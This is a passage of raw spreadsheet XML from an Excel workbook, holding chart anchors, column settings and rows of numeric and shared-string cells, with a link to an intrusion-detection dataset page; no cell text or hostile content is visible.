      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="6" name="Chart 6" title="Gráfico"/>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9</xdr:col>
      <xdr:colOff>2181225</xdr:colOff>
      <xdr:row>160</xdr:row>
      <xdr:rowOff>28575</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="7" name="Chart 7" title="Gráfico"/>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9</xdr:col>
      <xdr:colOff>2181225</xdr:colOff>
      <xdr:row>184</xdr:row>
      <xdr:rowOff>171450</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="8" name="Chart 8" title="Gráfico"/>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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>31</xdr:row>
      <xdr:rowOff>152400</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="9" name="Chart 9" title="Gráfico"/>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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>50</xdr:row>
      <xdr:rowOff>161925</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="10" name="Chart 10" title="Gráfico"/>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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>69</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="11" name="Chart 11" title="Gráfico"/>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15</xdr:col>
      <xdr:colOff>476250</xdr:colOff>
      <xdr:row>89</xdr:row>
      <xdr:rowOff>180975</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="12" name="Chart 12" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId12"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>23</xdr:col>
      <xdr:colOff>752475</xdr:colOff>
      <xdr:row>51</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5876925" cy="3752850"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="13" name="Chart 13" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId13"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>257175</xdr:colOff>
      <xdr:row>13</xdr:row>
      <xdr:rowOff>76200</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <mc:AlternateContent>
      <mc:Choice Requires="cx1">
        <xdr:graphicFrame>
          <xdr:nvGraphicFramePr>
            <xdr:cNvPr id="14" name="Chart 14" title="Gráfico"/>
            <xdr:cNvGraphicFramePr/>
          </xdr:nvGraphicFramePr>
          <xdr:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="0" cy="0"/>
          </xdr:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.microsoft.com/office/drawing/2014/chartex">
              <cx:chart r:id="rId14"/>
            </a:graphicData>
          </a:graphic>
        </xdr:graphicFrame>
      </mc:Choice>
      <mc:Fallback>
        <xdr:sp>
          <xdr:nvSpPr>
            <xdr:cNvPr id="1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chart isn't available in your version of Excel. Editing this shape or saving this workbook into a different file format will permanently break the chart.
</a:t>
              </a:r>
            </a:p>
          </xdr:txBody>
        </xdr:sp>
      </mc:Fallback>
    </mc:AlternateContent>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>304800</xdr:colOff>
      <xdr:row>34</xdr:row>
      <xdr:rowOff>66675</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="16" name="Chart 16" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId15"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>1</xdr:col>
      <xdr:colOff>257175</xdr:colOff>
      <xdr:row>53</xdr:row>
      <xdr:rowOff>9525</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5715000" cy="3533775"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="17" name="Chart 17" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId16"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>110</xdr:row>
      <xdr:rowOff>95250</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="18" name="Chart 18" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId17"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>135</xdr:row>
      <xdr:rowOff>19050</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="19" name="Chart 19" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId18"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>160</xdr:row>
      <xdr:rowOff>28575</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="20" name="Chart 20" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId19"/>
        </a:graphicData>
      </a:graphic>
    </xdr:graphicFrame>
    <xdr:clientData fLocksWithSheet="0"/>
  </xdr:oneCellAnchor>
  <xdr:oneCellAnchor>
    <xdr:from>
      <xdr:col>16</xdr:col>
      <xdr:colOff>1276350</xdr:colOff>
      <xdr:row>184</xdr:row>
      <xdr:rowOff>171450</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="7524750" cy="4657725"/>
    <xdr:graphicFrame>
      <xdr:nvGraphicFramePr>
        <xdr:cNvPr id="21" name="Chart 21" title="Gráfico"/>
        <xdr:cNvGraphicFramePr/>
      </xdr:nvGraphicFramePr>
      <xdr:xfrm>
        <a:off x="0" y="0"/>
        <a:ext cx="0" cy="0"/>
      </xdr:xfrm>
      <a:graphic>
        <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/chart">
          <c:chart r:id="rId20"/>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ip/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.unb.ca/cic/datasets/ids-2018.html"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8.38"/>
    <col customWidth="1" min="4" max="4" width="69.25"/>
    <col customWidth="1" min="5" max="5" width="21.5"/>
  </cols>
  <sheetData>
    <row r="7" ht="19.5" customHeight="1">
      <c r="C7" s="1" t="s">
        <v>0</v>
      </c>
      <c r="D7" s="2" t="s">
        <v>1</v>
      </c>
      <c r="E7" s="2" t="s">
        <v>2</v>
      </c>
      <c r="F7" s="2" t="s">
        <v>3</v>
      </c>
      <c r="G7" s="2" t="s">
        <v>4</v>
      </c>
      <c r="H7" s="2" t="s">
        <v>5</v>
      </c>
      <c r="I7" s="2" t="s">
        <v>6</v>
      </c>
      <c r="J7" s="3" t="s">
        <v>7</v>
      </c>
      <c r="K7" s="4"/>
      <c r="L7" s="4"/>
      <c r="M7" s="4"/>
      <c r="N7" s="4"/>
      <c r="O7" s="4"/>
      <c r="P7" s="4"/>
    </row>
    <row r="8" ht="51.75" customHeight="1">
      <c r="C8" s="5" t="s">
        <v>8</v>
      </c>
      <c r="D8" s="6" t="s">
        <v>9</v>
      </c>
      <c r="E8" s="7" t="s">
        <v>10</v>
      </c>
      <c r="F8" s="8">
        <v>45442.0</v>
      </c>
      <c r="G8" s="9" t="s">
        <v>11</v>
      </c>
      <c r="H8" s="10" t="s">
        <v>11</v>
      </c>
      <c r="I8" s="11" t="s">
        <v>11</v>
      </c>
      <c r="J8" s="12" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="9" ht="51.75" customHeight="1">
      <c r="C9" s="5" t="s">
        <v>12</v>
      </c>
      <c r="D9" s="6" t="s">
        <v>13</v>
      </c>
      <c r="E9" s="7" t="s">
        <v>10</v>
      </c>
      <c r="F9" s="8">
        <v>45442.0</v>
      </c>
      <c r="G9" s="13"/>
      <c r="H9" s="14"/>
      <c r="I9" s="11" t="s">
        <v>11</v>
      </c>
      <c r="J9" s="12" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="10" ht="51.75" customHeight="1">
      <c r="C10" s="5" t="s">
        <v>14</v>
      </c>
      <c r="D10" s="6" t="s">
        <v>15</v>
      </c>
      <c r="E10" s="7">
        <v>10605.0</v>
      </c>
      <c r="F10" s="8">
        <v>45441.0</v>
      </c>
      <c r="G10" s="13"/>
      <c r="H10" s="10" t="s">
        <v>11</v>
      </c>
      <c r="I10" s="11" t="s">
        <v>11</v>
      </c>
      <c r="J10" s="15"/>
    </row>
    <row r="11" ht="51.75" customHeight="1">
      <c r="C11" s="16" t="s">
        <v>16</v>
      </c>
      <c r="D11" s="17" t="s">
        <v>17</v>
      </c>
      <c r="E11" s="17" t="s">
        <v>10</v>
      </c>
      <c r="F11" s="18">
        <v>45441.0</v>
      </c>
      <c r="G11" s="19"/>
      <c r="H11" s="20"/>
      <c r="I11" s="21"/>
      <c r="J11" s="22" t="s">
        <v>11</v>
      </c>
    </row>
    <row r="12">
      <c r="C12" s="23"/>
      <c r="D12" s="23"/>
      <c r="E12" s="23"/>
      <c r="F12" s="23"/>
      <c r="G12" s="23"/>
      <c r="H12" s="23"/>
    </row>
    <row r="19">
      <c r="G19" s="24" t="s">
        <v>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7" width="25.13"/>
    <col customWidth="1" min="8" max="8" width="32.13"/>
    <col customWidth="1" min="9" max="9" width="27.63"/>
    <col customWidth="1" min="10" max="10" width="35.38"/>
    <col customWidth="1" min="11" max="22" width="25.13"/>
    <col customWidth="1" min="23" max="23" width="26.88"/>
    <col customWidth="1" min="24" max="26" width="25.13"/>
    <col customWidth="1" min="27" max="27" width="25.88"/>
    <col customWidth="1" min="28" max="28" width="30.13"/>
    <col customWidth="1" min="29" max="33" width="35.38"/>
  </cols>
  <sheetData>
    <row r="2" ht="31.5" customHeight="1">
      <c r="B2" s="25"/>
      <c r="C2" s="25"/>
      <c r="D2" s="25"/>
      <c r="E2" s="25"/>
      <c r="F2" s="25"/>
      <c r="G2" s="25"/>
      <c r="H2" s="26"/>
      <c r="I2" s="26"/>
      <c r="J2" s="26"/>
      <c r="K2" s="27" t="s">
        <v>4</v>
      </c>
      <c r="L2" s="28"/>
      <c r="M2" s="28"/>
      <c r="N2" s="29"/>
      <c r="O2" s="30" t="s">
        <v>5</v>
      </c>
      <c r="P2" s="28"/>
      <c r="Q2" s="28"/>
      <c r="R2" s="29"/>
      <c r="S2" s="31" t="s">
        <v>6</v>
      </c>
      <c r="T2" s="28"/>
      <c r="U2" s="28"/>
      <c r="V2" s="29"/>
      <c r="W2" s="32" t="s">
        <v>7</v>
      </c>
      <c r="X2" s="28"/>
      <c r="Y2" s="28"/>
      <c r="Z2" s="29"/>
    </row>
    <row r="3" ht="30.0" customHeight="1">
      <c r="B3" s="33" t="s">
        <v>19</v>
      </c>
      <c r="C3" s="34" t="s">
        <v>20</v>
      </c>
      <c r="D3" s="35" t="s">
        <v>21</v>
      </c>
      <c r="E3" s="35" t="s">
        <v>22</v>
      </c>
      <c r="F3" s="35" t="s">
        <v>23</v>
      </c>
      <c r="G3" s="35" t="s">
        <v>24</v>
      </c>
      <c r="H3" s="35" t="s">
        <v>25</v>
      </c>
      <c r="I3" s="35" t="s">
        <v>26</v>
      </c>
      <c r="J3" s="35" t="s">
        <v>27</v>
      </c>
      <c r="K3" s="36" t="s">
        <v>28</v>
      </c>
      <c r="L3" s="36" t="s">
        <v>29</v>
      </c>
      <c r="M3" s="37" t="s">
        <v>30</v>
      </c>
      <c r="N3" s="38" t="s">
        <v>31</v>
      </c>
      <c r="O3" s="39" t="s">
        <v>32</v>
      </c>
      <c r="P3" s="40" t="s">
        <v>33</v>
      </c>
      <c r="Q3" s="38" t="s">
        <v>30</v>
      </c>
      <c r="R3" s="38" t="s">
        <v>31</v>
      </c>
      <c r="S3" s="39" t="s">
        <v>32</v>
      </c>
      <c r="T3" s="40" t="s">
        <v>33</v>
      </c>
      <c r="U3" s="38" t="s">
        <v>30</v>
      </c>
      <c r="V3" s="38" t="s">
        <v>31</v>
      </c>
      <c r="W3" s="39" t="s">
        <v>32</v>
      </c>
      <c r="X3" s="40" t="s">
        <v>33</v>
      </c>
      <c r="Y3" s="38" t="s">
        <v>30</v>
      </c>
      <c r="Z3" s="38" t="s">
        <v>31</v>
      </c>
      <c r="AA3" s="34" t="s">
        <v>34</v>
      </c>
      <c r="AB3" s="34" t="s">
        <v>35</v>
      </c>
      <c r="AC3" s="34" t="s">
        <v>36</v>
      </c>
      <c r="AD3" s="34" t="s">
        <v>37</v>
      </c>
      <c r="AE3" s="34" t="s">
        <v>38</v>
      </c>
      <c r="AF3" s="34" t="s">
        <v>39</v>
      </c>
      <c r="AG3" s="41" t="s">
        <v>40</v>
      </c>
    </row>
    <row r="4" ht="153.75" customHeight="1">
      <c r="B4" s="42" t="s">
        <v>41</v>
      </c>
      <c r="C4" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D4" s="43" t="s">
        <v>42</v>
      </c>
      <c r="E4" s="43" t="s">
        <v>43</v>
      </c>
      <c r="F4" s="43" t="s">
        <v>44</v>
      </c>
      <c r="G4" s="43" t="s">
        <v>45</v>
      </c>
      <c r="H4" s="44" t="s">
        <v>46</v>
      </c>
      <c r="I4" s="44" t="s">
        <v>47</v>
      </c>
      <c r="J4" s="44" t="s">
        <v>48</v>
      </c>
      <c r="K4" s="45">
        <v>1421.1418</v>
      </c>
      <c r="L4" s="45">
        <v>2.0</v>
      </c>
      <c r="M4" s="45">
        <v>4.0</v>
      </c>
      <c r="N4" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O4" s="47" t="s">
        <v>49</v>
      </c>
      <c r="P4" s="47">
        <v>15.0</v>
      </c>
      <c r="Q4" s="47">
        <v>40.0</v>
      </c>
      <c r="R4" s="46" t="s">
        <v>50</v>
      </c>
      <c r="S4" s="48" t="s">
        <v>51</v>
      </c>
      <c r="T4" s="48">
        <v>22.0</v>
      </c>
      <c r="U4" s="48">
        <v>72.0</v>
      </c>
      <c r="V4" s="46" t="s">
        <v>50</v>
      </c>
      <c r="W4" s="49" t="s">
        <v>52</v>
      </c>
      <c r="X4" s="49">
        <v>31.0</v>
      </c>
      <c r="Y4" s="49">
        <v>96.0</v>
      </c>
      <c r="Z4" s="46" t="s">
        <v>53</v>
      </c>
      <c r="AA4" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AB4" s="44" t="s">
        <v>55</v>
      </c>
      <c r="AC4" s="44" t="s">
        <v>56</v>
      </c>
      <c r="AD4" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE4" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF4" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG4" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="5" ht="153.75" customHeight="1">
      <c r="B5" s="42" t="s">
        <v>41</v>
      </c>
      <c r="C5" s="52" t="s">
        <v>10</v>
      </c>
      <c r="D5" s="52" t="s">
        <v>42</v>
      </c>
      <c r="E5" s="43" t="s">
        <v>43</v>
      </c>
      <c r="F5" s="52" t="s">
        <v>59</v>
      </c>
      <c r="G5" s="43" t="s">
        <v>60</v>
      </c>
      <c r="H5" s="44" t="s">
        <v>61</v>
      </c>
      <c r="I5" s="44" t="s">
        <v>62</v>
      </c>
      <c r="J5" s="44" t="s">
        <v>63</v>
      </c>
      <c r="K5" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L5" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M5" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N5" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O5" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P5" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q5" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R5" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S5" s="48" t="s">
        <v>64</v>
      </c>
      <c r="T5" s="48">
        <v>2.0</v>
      </c>
      <c r="U5" s="48">
        <v>72.0</v>
      </c>
      <c r="V5" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W5" s="49" t="s">
        <v>65</v>
      </c>
      <c r="X5" s="49">
        <v>7.0</v>
      </c>
      <c r="Y5" s="49">
        <v>460.0</v>
      </c>
      <c r="Z5" s="46">
        <v>2002752.2002749</v>
      </c>
      <c r="AA5" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AB5" s="44" t="s">
        <v>66</v>
      </c>
      <c r="AC5" s="53" t="s">
        <v>67</v>
      </c>
      <c r="AD5" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE5" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF5" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG5" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="6" ht="153.75" customHeight="1">
      <c r="B6" s="42" t="s">
        <v>41</v>
      </c>
      <c r="C6" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D6" s="43" t="s">
        <v>42</v>
      </c>
      <c r="E6" s="43" t="s">
        <v>43</v>
      </c>
      <c r="F6" s="43" t="s">
        <v>59</v>
      </c>
      <c r="G6" s="43" t="s">
        <v>60</v>
      </c>
      <c r="H6" s="44" t="s">
        <v>61</v>
      </c>
      <c r="I6" s="44" t="s">
        <v>69</v>
      </c>
      <c r="J6" s="44" t="s">
        <v>70</v>
      </c>
      <c r="K6" s="45" t="s">
        <v>71</v>
      </c>
      <c r="L6" s="45">
        <v>43.0</v>
      </c>
      <c r="M6" s="45">
        <v>62.0</v>
      </c>
      <c r="N6" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O6" s="47" t="s">
        <v>72</v>
      </c>
      <c r="P6" s="47">
        <v>57.0</v>
      </c>
      <c r="Q6" s="47">
        <v>83.0</v>
      </c>
      <c r="R6" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S6" s="48" t="s">
        <v>73</v>
      </c>
      <c r="T6" s="48">
        <v>62.0</v>
      </c>
      <c r="U6" s="48">
        <v>4812.0</v>
      </c>
      <c r="V6" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W6" s="54" t="s">
        <v>74</v>
      </c>
      <c r="X6" s="49">
        <v>74.0</v>
      </c>
      <c r="Y6" s="49">
        <v>4983.0</v>
      </c>
      <c r="Z6" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA6" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AB6" s="44" t="s">
        <v>66</v>
      </c>
      <c r="AC6" s="55" t="s">
        <v>76</v>
      </c>
      <c r="AD6" s="44" t="s">
        <v>57</v>
      </c>
      <c r="AE6" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF6" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG6" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="7" ht="153.75" customHeight="1">
      <c r="B7" s="42" t="s">
        <v>41</v>
      </c>
      <c r="C7" s="52" t="s">
        <v>10</v>
      </c>
      <c r="D7" s="52" t="s">
        <v>77</v>
      </c>
      <c r="E7" s="43" t="s">
        <v>78</v>
      </c>
      <c r="F7" s="52" t="s">
        <v>79</v>
      </c>
      <c r="G7" s="43" t="s">
        <v>80</v>
      </c>
      <c r="H7" s="44" t="s">
        <v>81</v>
      </c>
      <c r="I7" s="44" t="s">
        <v>62</v>
      </c>
      <c r="J7" s="44" t="s">
        <v>82</v>
      </c>
      <c r="K7" s="45">
        <v>255.0</v>
      </c>
      <c r="L7" s="45">
        <v>1.0</v>
      </c>
      <c r="M7" s="45">
        <v>1.0</v>
      </c>
      <c r="N7" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O7" s="56">
        <v>255.0</v>
      </c>
      <c r="P7" s="47">
        <v>1.0</v>
      </c>
      <c r="Q7" s="47">
        <v>1.0</v>
      </c>
      <c r="R7" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S7" s="57">
        <v>255.0</v>
      </c>
      <c r="T7" s="48">
        <v>1.0</v>
      </c>
      <c r="U7" s="48">
        <v>1.0</v>
      </c>
      <c r="V7" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W7" s="49" t="s">
        <v>83</v>
      </c>
      <c r="X7" s="49">
        <v>4.0</v>
      </c>
      <c r="Y7" s="49">
        <v>7.0</v>
      </c>
      <c r="Z7" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AA7" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AB7" s="44" t="s">
        <v>84</v>
      </c>
      <c r="AC7" s="44" t="s">
        <v>85</v>
      </c>
      <c r="AD7" s="44" t="s">
        <v>68</v>
      </c>
      <c r="AE7" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF7" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG7" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="8" ht="107.25" customHeight="1">
      <c r="B8" s="42" t="s">
        <v>41</v>
      </c>
      <c r="C8" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D8" s="43" t="s">
        <v>86</v>
      </c>
      <c r="E8" s="43" t="s">
        <v>87</v>
      </c>
      <c r="F8" s="43" t="s">
        <v>88</v>
      </c>
      <c r="G8" s="58" t="s">
        <v>89</v>
      </c>
      <c r="H8" s="44" t="s">
        <v>90</v>
      </c>
      <c r="I8" s="44" t="s">
        <v>91</v>
      </c>
      <c r="J8" s="44" t="s">
        <v>92</v>
      </c>
      <c r="K8" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L8" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M8" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N8" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O8" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P8" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q8" s="47" t="s">
        <v>10</v>
      </c>
      <c r="R8" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S8" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T8" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U8" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V8" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W8" s="49" t="s">
        <v>93</v>
      </c>
      <c r="X8" s="49">
        <v>3.0</v>
      </c>
      <c r="Y8" s="49">
        <v>12.0</v>
      </c>
      <c r="Z8" s="46" t="s">
        <v>94</v>
      </c>
      <c r="AA8" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AB8" s="59" t="s">
        <v>95</v>
      </c>
      <c r="AC8" s="44" t="s">
        <v>96</v>
      </c>
      <c r="AD8" s="44" t="s">
        <v>97</v>
      </c>
      <c r="AE8" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF8" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG8" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="9" ht="107.25" customHeight="1">
      <c r="B9" s="42" t="s">
        <v>41</v>
      </c>
      <c r="C9" s="43" t="s">
        <v>10</v>
      </c>
      <c r="D9" s="43" t="s">
        <v>98</v>
      </c>
      <c r="E9" s="43" t="s">
        <v>99</v>
      </c>
      <c r="F9" s="43" t="s">
        <v>100</v>
      </c>
      <c r="G9" s="58" t="s">
        <v>101</v>
      </c>
      <c r="H9" s="44" t="s">
        <v>102</v>
      </c>
      <c r="I9" s="44" t="s">
        <v>103</v>
      </c>
      <c r="J9" s="44" t="s">
        <v>104</v>
      </c>
      <c r="K9" s="45" t="s">
        <v>10</v>
      </c>
      <c r="L9" s="45" t="s">
        <v>10</v>
      </c>
      <c r="M9" s="45" t="s">
        <v>10</v>
      </c>
      <c r="N9" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O9" s="47" t="s">
        <v>10</v>
      </c>
      <c r="P9" s="47" t="s">
        <v>10</v>
      </c>
      <c r="Q9" s="47"/>
      <c r="R9" s="46" t="s">
        <v>10</v>
      </c>
      <c r="S9" s="48" t="s">
        <v>10</v>
      </c>
      <c r="T9" s="48" t="s">
        <v>10</v>
      </c>
      <c r="U9" s="48" t="s">
        <v>10</v>
      </c>
      <c r="V9" s="46" t="s">
        <v>10</v>
      </c>
      <c r="W9" s="49">
        <v>2002749.0</v>
      </c>
      <c r="X9" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y9" s="49">
        <v>1.0</v>
      </c>
      <c r="Z9" s="46">
        <v>2002749.0</v>
      </c>
      <c r="AA9" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AB9" s="44" t="s">
        <v>105</v>
      </c>
      <c r="AC9" s="44" t="s">
        <v>10</v>
      </c>
      <c r="AD9" s="44" t="s">
        <v>106</v>
      </c>
      <c r="AE9" s="50" t="s">
        <v>54</v>
      </c>
      <c r="AF9" s="50" t="s">
        <v>58</v>
      </c>
      <c r="AG9" s="51" t="s">
        <v>58</v>
      </c>
    </row>
    <row r="10" ht="107.25" customHeight="1">
      <c r="B10" s="42" t="s">
        <v>107</v>
      </c>
      <c r="C10" s="52" t="s">
        <v>10</v>
      </c>
      <c r="D10" s="43" t="s">
        <v>108</v>
      </c>
      <c r="E10" s="43" t="s">
        <v>109</v>
      </c>
      <c r="F10" s="52" t="s">
        <v>110</v>
      </c>
      <c r="G10" s="43" t="s">
        <v>111</v>
      </c>
      <c r="H10" s="60" t="s">
        <v>112</v>
      </c>
      <c r="I10" s="44" t="s">
        <v>113</v>
      </c>
      <c r="J10" s="44" t="s">
        <v>114</v>
      </c>
      <c r="K10" s="45" t="s">
        <v>115</v>
      </c>
      <c r="L10" s="45">
        <v>44.0</v>
      </c>
      <c r="M10" s="45">
        <v>9562.0</v>
      </c>
      <c r="N10" s="46" t="s">
        <v>10</v>
      </c>
      <c r="O10" s="47" t="s">
        <v>116</v>
      </c>
      <c r="P10" s="47">
        <v>59.0</v>
      </c>
      <c r="Q10" s="47">
        <v>12739.0</v>
      </c>
      <c r="R10" s="46" t="s">
